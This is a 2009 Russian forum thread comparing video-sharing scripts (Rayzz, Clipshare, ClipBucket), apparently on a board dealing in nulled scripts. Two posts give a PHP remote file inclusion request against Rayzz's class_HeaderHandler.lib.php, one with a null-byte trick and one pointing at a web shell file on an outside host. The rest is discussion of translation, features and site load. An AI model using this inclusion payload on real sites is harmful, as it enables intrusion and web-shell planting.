Обсудим Rayzz Video Sharing RUS

Тема в разделе "Коммерческие", создана пользователем Me_and_My, 28 авг 2009.

?

Ваш выбор?

Голосование закрыто 27 сен 2009.
  1. Rayzz

1 голосов
    50,0%
  2. Clipshare

1 голосов
    50,0%
  3. ClipBucket

0 голосов
    0,0%
  4. Да **х надо вообще...

0 голосов
    0,0%
Информация :
Публиковать (для всех) нуленые версии, особенно от modulesgarden КАТЕГОРИЧЕСКИ не стоит. Тема мониторится оным разработчиком, а к нам приходят абузы которые нельзя игнорировать.
Статус темы:
Закрыта.
Модераторы: Amazko, Aste
  1. Me_and_My

Me_and_My Читатель

Заблокирован
    Регистр.:
    22 июл 2009
    Симпатии:
    50
    Вообщем на где то на 90% перевел его. Кто заинтересован, давайте обсудим его... потому что это самый продвинутый движек такого типа. У меня есть версии 1.3, 2.0, 2.3... хотя поидее хрен пойми какая версия потому что во всех встречаются даты типо
    * @since 2005-08-10

НО существует в ранних версиях такая штука как
    PHP-инклюдинг в рэйз и это очень напрягает. Хотя и найден он в 2007 в версии 2.0 включительно.

_http://[Taget]/[script_path]/common/classes/class_HeaderHandler.lib.php? CFG[site][project_path]=localfile%00 / remote http://
    Пробывал поинклюдить демку на сайте... естественно уязвимости нет больше. У них нет... на всех версиях которые сейчас в нуллах она есть, даже вроде как в 2.3... короче подробности если надо раскажу.

Так вот, надо либо найти 2.3.9 либо как то проблему эту решить...
    И еще проблема есть с комментами... по идее все вроде сделал, вместо latin1 запихал везде нормальную кодировку win-1251(хотя можно попробывать utf-8)...

Вообщем кому интересно давайте обсудим, перевод практически готов. Аналоги просто фуфельные у него.
    Clipshare - сплошная дыра!
    PhpFox не катит, так как там акцент на социалке... который видеошарингу не особо нужен, а в рэйз все на уровне... остальные шаринги и внимания не достойны. Сплошной фуфел один.

2. Fansmorgan

Fansmorgan

Регистр.:
    30 авг 2007
    Симпатии:
    161
    не было пока что в паблике нула версии 2.3.9 ! Думаю легче переписать что то в коде чем ждать или искать версию без этого бага !
    Ты вобще конечно сравнил бесплатную Clipshare и платные скрипты ... конечно в бесплатных дыр пруд пруди !

3. Me_and_My

Me_and_My Читатель

Заблокирован
    Регистр.:
    22 июл 2009
    Симпатии:
    50
    Fansmorgan, с каких это пор клипшара стала бесплатной? На счет впоследней версии рэйз, то я уже весь гугл изнасиловал... не т нигде ни нула, ни сорцев. :(

P.S может ты имел ввиду ClipBucket?

4. Fansmorgan

Fansmorgan

Регистр.:
    30 авг 2007
    Симпатии:
    161
    да, верно ... я ClipBucket юзал ... он конечно бесплатный, но моды и аддоны к нему платные. Да и русского как в Clipshare нет.
    Не знаю, я как то связался с Rayzz, но то была социалка ... с виду так ничего, а вобще функционал слабоват ! В общем выкинул ... да и вобще скрипты Rayzz сложноваты !
    Clipshare может и дырявый но всё поправимо ... да и комьюнити у этого скрипта большое нежели у Rayzz Video Sharing и переводом не надо заниматься - мультиязычный. Rayzz Video Sharing почему то не пользуется таким спросом как другие подобные двиги. ИМХО.
    А перепутал потому что они практически на одно лицо ... как братья близняшки )))

5. Me_and_My

Me_and_My Читатель

Заблокирован
    Регистр.:
    22 июл 2009
    Симпатии:
    50
    Это да... реально как под копирку.

Блин как версию то определить в нем? Везде написано что файлы за 2005-6 год включая версию 2.3 :nezn:
    И всетаки клипшара полное хавно!!! Даже части тех функций что есть в рэйз нету.

Нету фоток, аудио, да и вообще расчитан он на хранение СВОИХ роликов (кошечек собачек и прочей ваты) А мне нужно как дополнение к порталу чтобы видео закачивали по тематике

Судя по всему рэйз самый подходящий.

И еще я не врубаюсь как там они сделали редактор сообщений,
    1 файлика blank.htm в комплекте нет даже... ну это понятно создал пустую htm страничку кинул в папку admin а толку? Как нельзя было текст написать так и нельзя попрежнему. ппц.

6. Me_and_My

Me_and_My Читатель

Заблокирован
    Регистр.:
    22 июл 2009
    Симпатии:
    50
    Fansmorgan, а ты пробывал воспользываться уязвимостью этой, вернее проверить. Я вот пробую, но чет не хочет он выполнять ниче:

Запрос типо
    _http://localhost/video/common/classes/class_HeaderHandler.lib.php?CFG[localhost][video]=http://сайт где лежит шел.narod.ru/tryag.php

И говорит это о том что не выполняется проставление дефолтного языка
    Строчка вида
    require_once($CFG['site']['project_path'].'/includes/languages/'.$CFG['lang']['default'].'/headerLanguage.php');

:nezn:

7. BVI

BVI Прохожие

А я clipshere пользуюсь, не хватает подкатегорий

8. kidsindigo

kidsindigo Создатель

Регистр.:
    19 июл 2009
    Симпатии:
    0
    Если из видео скриптов выбирать , то я предпочел OStube . Но конечно чем то не устраивает ... Вот интересуюсь ryzzz скриптом .

Добавлено через 1 минуту
    Кстати , а где сам руссификатор для скрипта ?)

9. raptor

raptor Постоялец

Регистр.:
    19 фев 2008
    Симпатии:
    4
    Me_and_My - выложи свой перевод плиз, если не жалко

10. vlad_v

vlad_v

Регистр.:
    30 июн 2006
    Симпатии:
    67
    полгода назад я начал создавать и продвигать тьюбсайт - видео и фото шаринг. так что могу поделиться некоторым опытом.
    свой базовый движек я палить не стану, сори это сильно ценная инфа :D . скажу так, я вложил в движек+дизайн 900дол.
    само собой, что сразу все ставилось на выделенный сервак.
    при нагрузке 30к ботов дейли (боты ложат сервак - прими это во внимание. и их **й отрежешь - тебе же нужен поисковый траф, не так ли? :) ), пришлось переехать на сервак помощнее.

самое проблемное в таком сайте это контент - поэтому смотри что бы было удобно наполнять. у меня уже забито 100к паг (с этим проблем нету), из них активненько 45к в индексе (индекс перестал рости но это мой косяк , я его уже знаю).

что бы ответить на вопрос стоит ли выбрать твой движек,
    ответь для себя на такие вопросы:
    1) какой перспективы ты можешь достичь: будет у тебя большой сайт или он никогда не вырастит больше 50 уников дейли?
    2) видел ли ты своими глазами сайты на этом движке (в чистом виде) с нужной тебе нагрузкой?

удачи!

з.ы. лол, не посмотрел на дату первого поста! археологи :)

Статус темы:
Закрыта.